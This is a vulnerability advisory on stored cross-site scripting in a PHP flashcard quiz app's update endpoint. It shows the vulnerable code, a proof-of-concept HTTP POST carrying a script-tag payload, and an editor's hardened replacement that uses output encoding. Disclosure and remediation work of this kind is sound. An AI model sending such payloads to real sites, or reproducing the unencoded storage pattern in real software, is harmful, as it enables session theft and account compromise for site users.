Credits:
Reigz Macolor (https://github.com/reigz/)
Tested On:
Affected Version:
Flashcard Quiz App Using PHP and MySQL 1.0
Affected Site Page:
/flashcard-quiz/endpoint/update-flashcard.php
Affected Code:
<update-flashcard.php>
The endpoint copies the question and answer parameters straight from the POST body into the database. The UPDATE itself is parameterized (so this is not SQL injection), but the values are neither validated nor encoded, and when the card is later displayed the stored markup is interpreted by the browser, making the application vulnerable to stored cross-site scripting.
<?php
include("../conn/conn.php");
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (isset($_POST['question'], $_POST['answer'])) {
        // Values are taken verbatim from the request; nothing is validated or encoded.
        $cardID = $_POST['tbl_card_id'];
        $question = $_POST['question'];
        $answer = $_POST['answer'];
        try {
            // Parameterized query: safe against SQL injection, but the raw markup is stored as-is.
            $stmt = $conn->prepare("UPDATE tbl_card SET question = :question, answer = :answer WHERE tbl_card_id = :tbl_card_id");
            $stmt->bindParam(":tbl_card_id", $cardID, PDO::PARAM_STR);
            $stmt->bindParam(":question", $question, PDO::PARAM_STR);
            $stmt->bindParam(":answer", $answer, PDO::PARAM_STR);
            $stmt->execute();
            header("Location: http://localhost/flashcard-quiz/");
            exit();
        } catch (PDOException $e) {
            echo "Error:" . $e->getMessage();
        }
    } else {
        echo "
        <script>
            alert('Please fill in all fields!');
            window.location.href = 'http://localhost/flashcard-quiz/';
        </script>
        ";
    }
}
?>
Related CWE:
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Allows stored XSS by placing untrusted markup in the question and answer parameters.
The payload used for both parameters is %3Cscript%3Ealert%28%27reigz+was+here%27%29%3C%2Fscript%3E, the URL-encoded form of <script>alert('reigz was here')</script>. Once the update is accepted, the script runs in the browser of any user who views card 3.
POST /flashcard-quiz/endpoint/update-flashcard.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
Connection: close
tbl_card_id=3&question=%3Cscript%3Ealert%28%27reigz+was+here%27%29%3C%2Fscript%3E&answer=%3Cscript%3Ealert%28%27reigz+was+here%27%29%3C%2Fscript%3E

Once the malicious script is injected, the attacker can perform a variety of malicious activities. The attacker could transfer private information, such as cookies that may include session information, from the victim's machine to the attacker. The attacker could send malicious requests to a web site on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site. Phishing attacks could be used to emulate trusted web sites and trick the victim into entering a password, allowing the attacker to compromise the victim's account on that web site. Finally, the script could exploit a vulnerability in the web browser itself possibly taking over the victim's machine, sometimes referred to as "drive-by hacking."
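A hardened replacement for the endpoint, added here as an editor's example and not code from the Flashcard Quiz App. It validates the request (integer card ID, non-empty UTF-8 text under an assumed 2000-character limit) and, more importantly, encodes every stored field with htmlspecialchars() at the point where the card is rendered, since output encoding is what actually stops the stored XSS. It assumes $conn is the PDO handle from ../conn/conn.php as in the original, and that the page displaying cards calls e() on every field; the function names e(), validate_card_input() and render_card() are the editor's, not the application's. Run from the command line it needs no database and prints the advisory's payload safely encoded.

```php
<?php
// Editor's hardening example for update-flashcard.php (not the original app's code).
// Assumptions: $conn is the PDO handle from ../conn/conn.php; MAX_CARD_TEXT is an
// assumed application limit; the card template calls e() on every field it prints.
declare(strict_types=1);

const MAX_CARD_TEXT = 2000; // assumed limit, not from the original application

/** Escape a value for insertion into HTML text or a double-quoted attribute. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * Validate the POST body. Returns [card_id, question, answer] or throws
 * InvalidArgumentException. Validation rejects malformed input; it does NOT
 * make the text safe for HTML. Output encoding via e() does that.
 */
function validate_card_input(array $post): array
{
    $id = filter_var($post['tbl_card_id'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('tbl_card_id must be a positive integer');
    }
    $fields = [];
    foreach (['question', 'answer'] as $name) {
        $v = $post[$name] ?? '';
        if (!is_string($v) || trim($v) === '') {
            throw new InvalidArgumentException("$name is required");
        }
        if (!mb_check_encoding($v, 'UTF-8') || mb_strlen($v, 'UTF-8') > MAX_CARD_TEXT) {
            throw new InvalidArgumentException("$name is not valid UTF-8 or is too long");
        }
        $fields[$name] = $v;
    }
    return [$id, $fields['question'], $fields['answer']];
}

/** Render one stored card; every field passes through e() before reaching the page. */
function render_card(array $card): string
{
    return sprintf(
        '<div class="card" data-id="%s"><p class="q">%s</p><p class="a">%s</p></div>',
        e((string) $card['tbl_card_id']),
        e($card['question']),
        e($card['answer'])
    );
}

if (PHP_SAPI === 'cli') {
    // Stand-alone demo with the advisory's payload; no database involved.
    $payload = "<script>alert('reigz was here')</script>";
    [$id, $q, $a] = validate_card_input(['tbl_card_id' => '3', 'question' => $payload, 'answer' => $payload]);
    echo render_card(['tbl_card_id' => $id, 'question' => $q, 'answer' => $a]), PHP_EOL;
} elseif ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Hardened endpoint body: validate, store with typed bindings, never echo raw input.
    include '../conn/conn.php';
    try {
        [$id, $q, $a] = validate_card_input($_POST);
    } catch (InvalidArgumentException $ex) {
        http_response_code(400);
        header('Content-Type: text/plain; charset=UTF-8'); // plain text: no markup is interpreted
        echo 'Bad request: ', $ex->getMessage();
        exit();
    }
    try {
        $stmt = $conn->prepare('UPDATE tbl_card SET question = :question, answer = :answer WHERE tbl_card_id = :tbl_card_id');
        $stmt->bindValue(':tbl_card_id', $id, PDO::PARAM_INT);
        $stmt->bindValue(':question', $q, PDO::PARAM_STR);
        $stmt->bindValue(':answer', $a, PDO::PARAM_STR);
        $stmt->execute();
    } catch (PDOException $ex) {
        http_response_code(500);
        exit('Update failed'); // do not leak driver error text to the client
    }
    header('Location: /flashcard-quiz/'); // relative redirect instead of a hard-coded localhost URL
    exit();
}
```

Running `php hardened-update-flashcard.php` prints the card markup with the payload as `&lt;script&gt;alert(&apos;reigz was here&apos;)&lt;/script&gt;`, which the browser shows as text rather than executing. Note that htmlspecialchars() is correct only for HTML text and quoted attribute contexts; a field placed inside a <script> block, an event handler or a URL needs context-specific encoding, and a Content-Security-Policy header is worth adding as defence in depth.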
